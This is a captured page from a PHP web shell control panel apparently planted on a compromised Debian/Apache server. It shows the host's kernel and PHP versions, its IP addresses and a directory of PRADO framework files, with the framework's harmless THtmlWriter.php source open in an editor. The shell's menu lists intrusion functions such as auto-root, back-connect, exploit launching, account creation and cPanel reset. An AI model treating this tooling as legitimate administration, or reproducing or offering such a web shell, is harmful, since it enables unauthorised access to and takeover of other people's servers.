Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.116.24.238
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web /
framework /
Web /
UI /
[ HOME SHELL ]
Name
Size
Permission
Action
ActiveControls
[ DIR ]
drwxr-xr-x
WebControls
[ DIR ]
drwxr-xr-x
TCachePageStatePersister.php
5.9
KB
-rw-r--r--
TClientScriptManager.php
23.2
KB
-rw-r--r--
TCompositeControl.php
966
B
-rw-r--r--
TControl.php
66.37
KB
-rw-r--r--
TControlAdapter.php
3.48
KB
-rw-r--r--
TForm.php
4.3
KB
-rw-r--r--
THtmlWriter.php
5.1
KB
-rw-r--r--
TPage.php
36.97
KB
-rw-r--r--
TPageStatePersister.php
1.63
KB
-rw-r--r--
TSessionPageStatePersister.php
3.76
KB
-rw-r--r--
TTemplateControl.php
6.54
KB
-rw-r--r--
TTemplateControlInheritable.ph...
3.56
KB
-rw-r--r--
TTemplateManager.php
34.7
KB
-rw-r--r--
TThemeManager.php
13.78
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : THtmlWriter.php
<?php /** * THtmlWriter class file * * @author Qiang Xue <qiang.xue@gmail.com> * @link http://www.pradosoft.com/ * @copyright Copyright © 2005-2014 PradoSoft * @license http://www.pradosoft.com/license/ * @package System.Web.UI */ /** * THtmlWriter class * * THtmlWriter is a writer that renders valid XHTML outputs. * It provides functions to render tags, their attributes and stylesheet fields. * Attribute and stylesheet values will be automatically HTML-encoded if * they require so. For example, the 'value' attribute in an input tag * will be encoded. * * A common usage of THtmlWriter is as the following sequence: * <code> * $writer->addAttribute($name1,$value1); * $writer->addAttribute($name2,$value2); * $writer->renderBeginTag($tagName); * // ... render contents enclosed within the tag here * $writer->renderEndTag(); * </code> * Make sure each invocation of {@link renderBeginTag} is accompanied with * a {@link renderEndTag} and they are properly nested, like nesting * tags in HTML and XHTML. * * @author Qiang Xue <qiang.xue@gmail.com> * @package System.Web.UI * @since 3.0 */ class THtmlWriter extends TApplicationComponent implements ITextWriter { /** * @var array list of tags are do not need a closing tag */ private static $_simpleTags=array( 'area'=>true, 'base'=>true, 'basefont'=>true, 'bgsound'=>true, 'col'=>true, 'embed'=>true, 'frame'=>true, 'hr'=>true, 'img'=>true, 'input'=>true, 'isindex'=>true, 'link'=>true, 'meta'=>true, 'wbr'=>true, ); /** * @var array list of attributes to be rendered for a tag */ private $_attributes=array(); /** * @var array list of openning tags */ private $_openTags=array(); /** * @var array list of style attributes */ private $_styles=array(); /** * @var ITextWriter writer */ private $_writer=null; /** * Constructor. * @param ITextWriter a writer that THtmlWriter will pass its rendering result to */ public function __construct($writer) { $this->_writer=$writer; } public function getWriter() { return $this->_writer; } public function setWriter($writer) { $this->_writer = $writer; } /** * Adds a list of attributes to be rendered. * @param array list of attributes to be rendered */ public function addAttributes($attrs) { foreach($attrs as $name=>$value) $this->_attributes[THttpUtility::htmlStrip($name)]=THttpUtility::htmlEncode($value); } /** * Adds an attribute to be rendered. * @param string name of the attribute * @param string value of the attribute */ public function addAttribute($name,$value) { $this->_attributes[THttpUtility::htmlStrip($name)]=THttpUtility::htmlEncode($value); } /** * Removes the named attribute from rendering * @param string name of the attribute to be removed */ public function removeAttribute($name) { unset($this->_attributes[THttpUtility::htmlStrip($name)]); } /** * Adds a list of stylesheet attributes to be rendered. * @param array list of stylesheet attributes to be rendered */ public function addStyleAttributes($attrs) { foreach($attrs as $name=>$value) $this->_styles[THttpUtility::htmlStrip($name)]=THttpUtility::htmlEncode($value); } /** * Adds a stylesheet attribute to be rendered * @param string stylesheet attribute name * @param string stylesheet attribute value */ public function addStyleAttribute($name,$value) { $this->_styles[THttpUtility::htmlStrip($name)]=THttpUtility::htmlEncode($value); } /** * Removes the named stylesheet attribute from rendering * @param string name of the stylesheet attribute to be removed */ public function removeStyleAttribute($name) { unset($this->_styles[THttpUtility::htmlStrip($name)]); } /** * Flushes the rendering result. * This will invoke the underlying writer's flush method. * @return string the content being flushed */ public function flush() { return $this->_writer->flush(); } /** * Renders a string. * @param string string to be rendered */ public function write($str) { $this->_writer->write($str); } /** * Renders a string and appends a newline to it. * @param string string to be rendered */ public function writeLine($str='') { $this->_writer->write($str."\n"); } /** * Renders an HTML break. */ public function writeBreak() { $this->_writer->write('<br/>'); } /** * Renders the openning tag. * @param string tag name */ public function renderBeginTag($tagName) { $str='<'.$tagName; foreach($this->_attributes as $name=>$value) $str.=' '.$name.'="'.$value.'"'; if(!empty($this->_styles)) { $str.=' style="'; foreach($this->_styles as $name=>$value) $str.=$name.':'.$value.';'; $str.='"'; } if(isset(self::$_simpleTags[$tagName])) { $str.=' />'; $this->_openTags[] = ''; } else { $str.='>'; $this->_openTags[] = $tagName; } $this->_writer->write($str); $this->_attributes=array(); $this->_styles=array(); } /** * Renders the closing tag. */ public function renderEndTag() { if(!empty($this->_openTags) && ($tagName=array_pop($this->_openTags))!=='') $this->_writer->write('</'.$tagName.'>'); } }
Close